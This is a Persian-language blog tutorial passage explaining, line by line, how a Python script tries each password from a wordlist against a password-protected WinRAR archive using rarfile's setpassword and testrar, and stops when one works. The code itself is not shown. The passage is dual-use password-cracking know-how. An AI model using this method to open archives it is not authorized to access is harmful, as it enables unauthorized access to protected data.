در ابتدای حلقه ما اومدیم n\ آخر هر خط (هر خط یه پسوورده) رو حذف کردیم چون به هرحال hossein\n با hossein خیلی فرق داره . سپس با دستور print چاپ کردیم که چه پسووردی رو داریم تست میکنیم . بعد با استفاده از عبارت کنترلی try / except پسوورد مورد نظر که داخل متغییر password (متغییر حلقه ی فور) هستش رو تست کردیم . چجوری ؟ داخل بلوک try اومدیم با استفاده از متود setpassword پسوورد مورد نظر رو ست کردیم روی فایل . بعد تابع testrar فراخوانی کردیم . این تابع میاد تست میکنه میبینه آیا با این پسووردی که ما ست کردیم فایل وینرارمون باز میشه یا نه . خب اگه پسوورد درست باشه که این تابع testrar هیچ واکنشی نشون نمیده و میریم سراغ خط بعدی که در خط بعدی گفتیم پسوورد جاری که پسوورد  درسته رو چاپ کنه و بعدشم متغییر password_found رو مقدارشو True کردیم و با دستور break از حلقه خارج شدیم . اما گه پسوورد درست نباشه تابع testrar ارور میده (ارور rarfile.RarWrongPassword) چون با این پسوورد نتونسته فایل رو باز کنه و  وقتی ارور بده کد های داخل بلوک except اجرا میشه و از اونجایی که داخل except ما دستور continue رو نوشتیم  دوباره میره از اول حلقه شروع میکنه و پسوورد بعدی رو تست میکنه .

بعد از اینکه از حلقه for خارج شد (حالا یا همه ی پسوورد های رو تست کرد یا اینکه پسوورد درست رو پیدا کرد و با دستور break که نوشتیم خارج شد ) ، میاد با یه if چک میکنه مقدار password_found چیه . اگه True باشه یعنی پسوورد درست رو توی حلقه پیدا کرده و به کاربر نمایش داده پس خارج میشه از برنامه . اما اگه True نباشه یعنی False باشه این معنی رو میده که پسوورد توی پسوورد لیست نبوده و برنامه نتونسته اونو پیدا کنه خب براش چاپ میکنه من نتونستم پسووردو پیدا کنم و بعدشم برنامه تموم میشه و خارج میشه .

 

 وقتی سورس رو اجرا کنیم ابتدا دو ورودی مورد نیازشو از ما میگیره و کارشو شروع میکنه مثل تصویر زیر :

 

 

در پست های آینده نحوه ی نوشتن کرکر وینرار با سیستم threading یا همون پردازش های موازی رو هم میگیم .